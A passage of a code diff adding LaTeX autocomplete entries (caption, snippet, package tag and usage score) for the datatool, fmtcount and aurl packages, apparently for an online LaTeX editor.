6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'datatool-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'datatool-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'datatool-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'datatool-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'datatool-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'datatool-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'datatool-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'datatool-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'datatool-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'datatool-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'datatool-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'datatool-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'datatool-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'datatool-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'datatool-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'datatool-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'datatool-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'datatool-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'datatool-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'datatool-cmd', + score: 
0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'datatool-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'datatool-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'datatool-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'datatool-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'datatool-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'datatool-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'datatool-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'datatool-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'datatool-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'datatool-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'datatool-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'datatool-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'datatool-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'datatool-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'datatool-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'datatool-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'datatool-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'datatool-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'datatool-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datatool-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'datatool-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'datatool-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'datatool-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'datatool-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'datatool-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'datatool-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'datatool-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'datatool-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'datatool-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'datatool-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: 
'\\boolean{$1}', + meta: 'datatool-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'datatool-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'datatool-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'datatool-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'datatool-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'datatool-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'datatool-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'datatool-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'datatool-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datatool-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'datatool-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'datatool-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'datatool-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'datatool-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'datatool-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'datatool-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'datatool-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'datatool-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'datatool-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'datatool-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'datatool-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'datatool-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datatool-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datatool-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'datatool-cmd', + score: 0.0063276692758974925, + }, + ], + fmtcount: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fmtcount-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fmtcount-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'fmtcount-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\ifthenelse{}{}{}', + 
snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'fmtcount-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'fmtcount-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'fmtcount-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'fmtcount-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'fmtcount-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'fmtcount-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'fmtcount-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'fmtcount-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'fmtcount-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'fmtcount-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'fmtcount-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'fmtcount-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'fmtcount-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'fmtcount-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'fmtcount-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'fmtcount-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'fmtcount-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'fmtcount-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'fmtcount-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'fmtcount-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'fmtcount-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'fmtcount-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'fmtcount-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fmtcount-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'fmtcount-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'fmtcount-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'fmtcount-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'fmtcount-cmd', + score: 
0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fmtcount-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'fmtcount-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'fmtcount-cmd', + score: 0.0063276692758974925, + }, + ], + aurl: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'aurl-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'aurl-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'aurl-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'aurl-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'aurl-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'aurl-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'aurl-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'aurl-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'aurl-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'aurl-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'aurl-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'aurl-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'aurl-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'aurl-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'aurl-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'aurl-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\figureautorefname', + snippet: '\\figureautorefname', + meta: 'aurl-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\figureautorefname{}', + snippet: '\\figureautorefname{$1}', + meta: 'aurl-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'aurl-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\footnoteautorefname', + snippet: '\\footnoteautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\roman{}', + snippet: '\\roman{$1}', + 
meta: 'aurl-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\roman', + snippet: '\\roman', + meta: 'aurl-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'aurl-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\MakeLowercase{}', + snippet: '\\MakeLowercase{$1}', + meta: 'aurl-cmd', + score: 0.017289599800633146, + }, + { + caption: '\\textunderscore', + snippet: '\\textunderscore', + meta: 'aurl-cmd', + score: 0.001509072212764015, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'aurl-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'aurl-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'aurl-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'aurl-cmd', + score: 7.849662248028187, + }, + { + caption: '\\FancyVerbLineautorefname', + snippet: '\\FancyVerbLineautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\hyperlink{}{}', + snippet: '\\hyperlink{$1}{$2}', + meta: 'aurl-cmd', + score: 0.00978652043902115, + }, + { + caption: '\\tableautorefname', + snippet: '\\tableautorefname', + meta: 'aurl-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\tableautorefname{}', + snippet: '\\tableautorefname{$1}', + meta: 'aurl-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\equationautorefname', + snippet: '\\equationautorefname', + meta: 'aurl-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\equationautorefname{}', + snippet: '\\equationautorefname{$1}', + meta: 'aurl-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\chapterautorefname', + snippet: '\\chapterautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'aurl-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'aurl-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'aurl-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\appendixautorefname', + snippet: '\\appendixautorefname', + meta: 'aurl-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\appendixautorefname{}', + snippet: '\\appendixautorefname{$1}', + meta: 'aurl-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\newlabel{}{}', + snippet: '\\newlabel{$1}{$2}', + meta: 'aurl-cmd', + score: 0.00029737672328168955, + }, + { + caption: '\\texorpdfstring{}{}', + snippet: '\\texorpdfstring{$1}{$2}', + meta: 'aurl-cmd', + score: 0.0073781967296121, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'aurl-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\alph', + snippet: '\\alph', + meta: 'aurl-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\alph{}', + snippet: '\\alph{$1}', + meta: 'aurl-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'aurl-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'aurl-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'aurl-cmd', + score: 3.800886892251021, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'aurl-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'aurl-cmd', + score: 
0.2334089308452787, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\itemautorefname', + snippet: '\\itemautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'aurl-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sectionautorefname', + snippet: '\\sectionautorefname', + meta: 'aurl-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\sectionautorefname{}', + snippet: '\\sectionautorefname{$1}', + meta: 'aurl-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\LaTeXe', + snippet: '\\LaTeXe', + meta: 'aurl-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\LaTeXe{}', + snippet: '\\LaTeXe{$1}', + meta: 'aurl-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'aurl-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'aurl-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\hypertarget{}{}', + snippet: '\\hypertarget{$1}{$2}', + meta: 'aurl-cmd', + score: 0.009652820108904094, + }, + { + caption: '\\theoremautorefname', + snippet: '\\theoremautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'aurl-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\subparagraphautorefname', + snippet: '\\subparagraphautorefname', + meta: 'aurl-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'aurl-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'aurl-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'aurl-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\href{}{}', + snippet: '\\href{$1}{$2}', + meta: 'aurl-cmd', + score: 0.27111130260612365, + }, + { + caption: '\\Roman{}', + snippet: '\\Roman{$1}', + meta: 'aurl-cmd', + score: 0.0038703587462843594, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\autoref{}', + snippet: '\\autoref{$1}', + meta: 'aurl-cmd', + score: 0.03741172773691362, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'aurl-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'aurl-cmd', + score: 7.847906405228455, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'aurl-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'aurl-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'aurl-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\partautorefname', + snippet: '\\partautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\Itemautorefname{}', + snippet: '\\Itemautorefname{$1}', + meta: 'aurl-cmd', + score: 6.006262128895586e-5, + }, + { + caption: '\\halign{}', + snippet: '\\halign{$1}', + meta: 'aurl-cmd', + score: 0.00017906650306643613, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'aurl-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'aurl-cmd', + score: 1.4380093454211778, + }, + { + 
caption: '\\Alph{}', + snippet: '\\Alph{$1}', + meta: 'aurl-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\Alph', + snippet: '\\Alph', + meta: 'aurl-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'aurl-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\MP', + snippet: '\\MP', + meta: 'aurl-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\MP{}', + snippet: '\\MP{$1}', + meta: 'aurl-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\paragraphautorefname', + snippet: '\\paragraphautorefname', + meta: 'aurl-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\citeN{}', + snippet: '\\citeN{$1}', + meta: 'aurl-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\citeN', + snippet: '\\citeN', + meta: 'aurl-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'aurl-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\subsectionautorefname', + snippet: '\\subsectionautorefname', + meta: 'aurl-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\subsectionautorefname{}', + snippet: '\\subsectionautorefname{$1}', + meta: 'aurl-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\hyperref[]{}', + snippet: '\\hyperref[$1]{$2}', + meta: 'aurl-cmd', + score: 0.004515152477030062, + }, + { + caption: '\\arabic{}', + snippet: '\\arabic{$1}', + meta: 'aurl-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\arabic', + snippet: '\\arabic', + meta: 'aurl-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\newline', + snippet: '\\newline', + meta: 'aurl-cmd', + score: 0.3311721696201715, + }, + { + caption: '\\hypersetup{}', + snippet: '\\hypersetup{$1}', + meta: 'aurl-cmd', + score: 0.06967310843464661, + }, + { + caption: '\\subsubsectionautorefname', + snippet: '\\subsubsectionautorefname', + meta: 'aurl-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\subsubsectionautorefname{}', + snippet: '\\subsubsectionautorefname{$1}', + meta: 'aurl-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'aurl-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + 
snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 